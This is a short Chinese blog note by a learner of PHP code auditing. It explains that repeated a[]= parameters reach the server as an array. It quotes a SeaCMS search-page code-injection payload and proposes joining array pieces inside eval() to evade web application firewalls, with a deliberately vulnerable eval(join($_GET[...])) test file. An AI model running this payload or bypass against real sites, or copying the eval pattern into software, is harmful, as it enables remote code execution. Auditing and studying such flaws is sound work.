继续浏览精彩内容
慕课网APP
程序员的梦工厂
打开
继续
感谢您的支持,我会继续努力的
赞赏金额会直接到老师账户
将二维码发送给自己后长按识别
微信支付
支付宝支付

php通过http请求发送数组

狐的传说
关注TA
已关注
手记 319
粉丝 88
获赞 555

最近开始学习php审计,刚好赶上研究seacms,就发现了payload处一个奇怪的点

1searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

9[]=ph&9[]=pinfo();

就尝试了一下,发现在接收数据时,例:

键名=a,那传递a[]=a&a[]=b时,a即为一个数组,便做了个测试,果真如此

服务器端测试代码

<?php
    print_r($_GET[1]);
?>


测试结果如下

https://img4.mukewang.com/5b07bd540001f65304590220.jpg


那么这一个有什么用呢?思考了一下,如果服务器上有安全狗或者waf等防护工具,那么配合其他php函数,例如join函数,可能可以达到绕过效果

提供一个简单思路

服务器测试代码

<?php
    eval(join($_GET[123]));
?>


测试结果如下

https://img1.mukewang.com/5b07bd7300011da805970079.jpg


错误之处,敬请指正

打开App,阅读手记
0人推荐
发表评论
随时随地看视频慕课网APP